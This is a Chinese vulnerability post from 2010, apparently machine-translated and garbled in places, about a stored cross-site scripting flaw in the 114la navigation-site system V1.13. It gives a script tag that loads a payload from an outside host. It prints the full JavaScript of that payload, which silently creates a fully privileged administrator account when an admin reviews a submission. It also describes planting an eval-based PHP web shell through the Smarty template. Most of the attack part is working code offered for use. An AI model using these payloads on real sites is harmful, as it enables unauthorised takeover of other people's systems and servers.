1 1 4. Site Navigation Station system of V1. 1 3 XSS cross-site attacks-vulnerability warning-the black bar safety net

2010-07-01T00:00:00
ID MYHACK58:62201027451
Type myhack58
Reporter 佚名
Modified 2010-07-01T00:00:00

Description

url-submit/index. php to submit the data is not filtered directly into the database,resulting in a savings ofXSSvulnerability

Test method: In the Site Name column fill in the<script src=http://www. hackqing. cn/qingexp. js></script>(src is fill in your own js file for the address,don't tell me that the file does not exist Other to meet the requirements it is OK..then submit..wait for the administrator to view the website included in the review when it will execute that js file. Here I put a add administrator account of js,you can actually directly take the shell of

qingexp.js

//Add an administrator account var siteurl = document. URL; siteurlsiteurl = siteurl. replace(/(.\/) {0,}([^\.]+)./ ig,"$1"); var username="qing";//username var password="qing520";//password var request = false; if(window. XMLHttpRequest) { request = new XMLHttpRequest(); if(request. overrideMimeType) { request. overrideMimeType('text/xml'); } } else if(window. ActiveXObject) { var versions = ['Microsoft. XMLHTTP', 'MSXML. XMLHTTP', 'Microsoft. XMLHTTP', 'Msxml2. XMLHTTP. 7. 0','Msxml2. XMLHTTP. 6. 0','Msxml2. XMLHTTP. 5. 0', 'Msxml2. XMLHTTP. 4. 0', 'MSXML2. XMLHTTP. 3. 0', 'MSXML2. XMLHTTP']; for(var i=0; i<versions. length; i++) { try { request = new ActiveXObject(versions[i]); } catch(e) {} } } var xmlhttp=request; xmlhttp. open("GET",siteurl+"/index. php? c=member", false); xmlhttp. setRequestHeader("Referer", siteurl); xmlhttp. setRequestHeader("Content-Type","application/x-www-form-urlencoded"); xmlhttp. send(); if (xmlhttp. responseText. indexOf(username)<0) { xmlhttp. open("POST", siteurl + "/index. php? c=member&a=member_add", false); xmlhttp. setRequestHeader("Referer", siteurl); xmlhttp. setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp. send("name=" + username + "&password=" + password + "&step=2"); xmlhttp. open("POST", siteurl + "/index. php? c=member&a=member_edit", false); xmlhttp. setRequestHeader("Referer", siteurl); xmlhttp. setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlhttp. send("auth%5Bmember114laurl_add114lafeedback%5D=1&auth%5Bconfig114la%5D=1&auth%5Bfamous_nav114lafamous_loop_playfamous_nav_tab114laindex_site114laindex_tool114lamztopl114larecycler%5D=1&auth%5Bzhuanti114lazhuanti_class%5D=1&auth%5Badvise_index114lakey%5D=1&auth%5Bbackup114larestore114larepair114laclear114lamysites%5D=1&auth%5Btemplate_manage%5D=1&auth%5Bmake_html114la%5D=1&auth%5Bheader114lamenu114lawelcome114laframe114lalogin%5D=1&auth%5Bsecurity114la%5D=1&auth%5Bsite_manage%5D=1&auth%5Bplan% 5D=1&auth%5Bclass%5D=1&auth%5Blog%5D=1&step=2&name=" + username); }

Data management->application included section->insert<{php}>@eval($_POST['a']);< {/php}> -> shell:url-submit/index.php Note:Due to the site using the smarty template engine,smarty supports the insertion of php code,cause the vulnerability to happen,as can be seen the author of third-party libraries don't know fully..

Affected versions: V1. 1 3 Official address: www.114la.com/114la